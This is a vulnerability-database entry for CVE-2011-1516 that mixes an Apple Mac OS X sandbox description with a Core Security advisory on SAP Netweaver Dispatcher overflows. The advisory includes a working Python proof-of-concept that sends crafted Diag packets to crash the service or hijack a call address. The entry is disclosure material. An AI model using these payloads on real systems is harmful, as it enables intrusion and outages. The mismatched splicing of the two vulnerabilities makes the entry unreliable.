CVE-2011-1516 (GCVE-0-2011-1516)

Vulnerability from cvelistv5 – Published: 2011-11-15 18:00 – Updated: 2024-08-06 22:28

Summary

Severity ?

No CVSS data available.

CWE

Assigner

mitre

References

URL

VAR-201111-0111

Vulnerability from variot - Updated: 2023-12-18 12:22

The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox profiles in Apple Mac OS X 10.5.x through 10.7.x do not propagate restrictions to all created processes, which allows remote attackers to access network resources via a crafted application, as demonstrated by use of osascript to send Apple events to the launchd daemon, a related issue to CVE-2008-7303. An attacker can exploit this issue to bypass certain security restrictions and gain access to restricted functionality. Apple Mac OS X 10.5.x, 10.6.x and 10.7.x are vulnerable; other versions may also be affected. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/

SAP Netweaver Dispatcher Multiple Vulnerabilities

Advisory Information

Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release

Vulnerability Information

Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514

Vulnerability Description

SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated, remote attacker to execute arbitrary code and lead to denial of service conditions. The vulnerabilities are triggered sending specially crafted SAP Diag packets to remote TCP port 32NN (being NN the SAP system number) of a host running the "Dispatcher" service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered.

Vulnerable packages

. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked.

Non-vulnerable packages

. Vendor did not provide this information.

Vendor Information, Solutions and Workarounds

SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information.

Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities:

Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities).
Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
Credits

These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories .

Technical Description / Proof of Concept Code

NOTE: (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).

The following python script can be used to reproduce the vulnerabilities described below:

/----- import socket, struct from optparse import OptionParser

Parse the target options

parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args()

def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet)

def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data)

def initialize(sock): diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00" user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8" support_data = "\x10\x04\x0b\x00\x20" support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93" support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00" dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" dpheader+= struct.pack("I", len(diagheader + user_connect + support_data)) dpheader+= "\x00\xff\xff\xff\xff\xff\xff " dpheader+= "terminalXXXXXXX" dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" send_packet(sock, dpheader + diagheader + user_connect + support_data)

def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom)

Connect and send initialization packet

connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection)

-----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.

8.1. SAP Netweaver DiagTraceR3Info Vulnerability

[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. This vulnerability could allow a remote unauthenticated attacker to execute arbitrary code with the privileges of the user running the "Dispatcher" service. The following python code can be used to trigger the vulnerability:

/----- crash = "X"114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/

8.2. SAP Netweaver DiagTraceHex Denial of Service Vulnerability

[CVE-2011-1517] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function 'DiagTraceHex' in the 'disp+work.exe'. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability:

/----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/

8.3. SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability

[CVE-2012-2511] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function 'DiagTraceAtoms'. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability:

/----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/

8.4. SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability

[CVE-2012-2512] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function 'DiagTraceStreamI' and could allow a remote unauthenticated attacker to conduct a denial of service attack.

/----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/

8.5. SAP Netweaver Diaginput Denial of Service Vulnerability

[CVE-2012-2513] The vulnerability can be triggered by the vulnerable function 'Diaginput', allowing a denial of service attack against the vulnerable systems.

/----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/

8.6. SAP Netweaver DiagiEventSource Denial of Service Vulnerability

[CVE-2012-2514] The vulnerability can be triggered by the vulnerable function 'DiagiEventSource' in the 'disp+work.exe' module. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack.

/----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/

Report Timeline

. 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published.

References

[1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.

[4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910.

About CoreLabs

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

About Core Security Technologies

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

Disclaimer

The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201111-0111",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.5.1"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.6.8"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.7.0"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.5.0"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.5.2"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.6.7"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.5.3"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.7.2"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.7.1"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.5.4"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.5.6"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.6.6"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.6.1"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.5.7"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.6.2"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.5.8"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.6.3"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.6.4"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.6.5"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.6.0"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.5.5"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "10.5.x to  10.7.x"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.7"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.6"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.6"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.3"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.7.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.8"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.7"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.7"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.8"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.7.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.3"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "50644"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003010"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1516"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-271"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.7.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-1516"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Anibal Sacco and Matias Eissler from Core Security Technologies.",
    "sources": [
      {
        "db": "BID",
        "id": "50644"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-271"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2011-1516",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2011-1516",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "id": "VHN-49461",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:H/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2011-1516",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201111-271",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-49461",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2011-1516",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-49461"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-1516"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003010"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1516"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-271"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox profiles in Apple Mac OS X 10.5.x through 10.7.x do not propagate restrictions to all created processes, which allows remote attackers to access network resources via a crafted application, as demonstrated by use of osascript to send Apple events to the launchd daemon, a related issue to CVE-2008-7303. \nAn attacker can exploit this issue to bypass certain security restrictions and gain access to restricted functionality. \nApple Mac OS X 10.5.x, 10.6.x and 10.7.x are vulnerable; other versions may also be affected. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nSAP Netweaver Dispatcher Multiple Vulnerabilities\n\n\n1. *Advisory Information*\n\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\nAdvisory ID: CORE-2012-0123\nAdvisory URL:\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\nDate published: 2012-05-08\nDate of last update: 2012-05-08\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Buffer overflow [CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,\nCVE-2012-2513, CVE-2012-2514\n\n\n3. *Vulnerability Description*\n\nSAP Netweaver [1] is a technology platform for building and integrating\nSAP business applications. Multiple vulnerabilities have been found in\nSAP Netweaver that could allow an unauthenticated, remote attacker to\nexecute arbitrary code and lead to denial of service conditions. The\nvulnerabilities are triggered sending specially crafted SAP Diag packets\nto remote TCP port 32NN (being NN the SAP system number) of a host\nrunning the \"Dispatcher\" service, part of SAP Netweaver Application\nServer ABAP. By sending different messages, the different\nvulnerabilities can be triggered. \n\n\n4. *Vulnerable packages*\n\n   . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. \n\n\n5. *Non-vulnerable packages*\n\n   . Vendor did not provide this information. \n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note\nhttps://service.sap.com/sap/support/notes/1687910 regarding these\nissues. Contact SAP for further information. \n\nMartin Gallo proposed the following actions to mitigate the impact of\nthe vulnerabilities:\n\n   1. Disable work processes\u0027 Developer Traces for the \u0027Dialog\nProcessing\u0027 component (for the vulnerabilities [CVE-2011-1516],\n[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). \n   2. Restrict access to the Dispatcher service\u0027s TCP ports (3200/3299)\n(for all vulnerabilities). \n   3. Restrict access to the work process management transactions\nSM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the\nvulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and\n[CVE-2012-2512]). \n\n\n7. *Credits*\n\nThese vulnerabilities were discovered and researched by Martin Gallo\nfrom\nhttp://www.coresecurity.com/content/services-overview-core-security-consulting-services. \nThe publication of this advisory was coordinated by Fernando Miranda\nfrom http://www.coresecurity.com/content/corelabs-advisories . \n\n\n8. *Technical Description / Proof of Concept Code*\n\n*NOTE:* (The tracing of \u0027Dialog processing\u0027 has to be in level 2 or 3 in\norder to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]\nand [CVE-2012-2512]). \n\nThe following python script can be used to reproduce the vulnerabilities\ndescribed below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-l\", \"--hostname\", dest=\"hostname\", 